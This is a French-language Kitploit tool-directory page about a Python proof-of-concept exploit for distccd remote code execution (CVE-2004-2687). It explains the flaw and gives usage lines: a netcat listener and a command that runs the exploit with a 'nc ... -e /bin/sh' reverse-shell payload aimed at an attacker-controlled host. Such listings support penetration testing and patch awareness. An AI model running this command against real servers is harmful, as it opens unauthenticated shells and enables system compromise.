Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
distccd_rce_CVE-2004-2687 — Exploit de preuve de concept basé sur Python pour la vulnérabilité d'exécution de code à distance distccd CVE-2004-2687, permettant un accès shell non authentifié sur les serveurs vulnérables. | Kitploit
Outils/GitHubGitHub/h3x0v3rl0rd/distccd_rce_cve-2004-2687
Génération de PayloadsAnalyse des VulnérabilitésExploitationTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubh3x0v3rl0rd/distccd_rce_cve-2004-2687

distccd_rce_CVE-2004-2687

Exploit de preuve de concept basé sur Python pour la vulnérabilité d'exécution de code à distance distccd CVE-2004-2687, permettant un accès shell non authentifié sur les serveurs vulnérables.

Voir le dépôt
23il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

distccd_rce_CVE-2004-2687

🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ Mise à niveau vers Python3

Aperçu

Ce dépôt contient un exploit preuve de concept (PoC) pour la vulnérabilité distccd identifiée comme CVE-2004-2687. La vulnérabilité existe dans le démon distccd, qui fait partie du système de compilation distribuée distcc pour C/C++. Lorsqu'il est mal configuré, distccd permet à des attaquants distants d'exécuter des commandes arbitraires sur le serveur sans aucune authentification.

Détails de la vulnérabilité

distcc est conçu pour distribuer des tâches de compilation sur plusieurs machines afin d'accélérer le processus de construction. Cependant, si le démon distccd n'est pas correctement sécurisé, il expose une vulnérabilité d'exécution de code à distance (RCE). Cela se produit car le démon écoute sur un port réseau et accepte les commandes de tout client, leur permettant d'exécuter des commandes shell sur le serveur en tant qu'utilisateur exécutant le démon.

La vulnérabilité a été attribuée CVE-2004-2687 et affecte les versions de distccd antérieures à 3.1. Lorsqu'elle est exploitée, un attaquant peut obtenir un accès shell à la machine vulnérable, conduisant à une compromission potentielle de l'ensemble du système.

root@kitploit:~
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"

Vulnérabilité :

image

Exploit :

image

Télécharger l’outil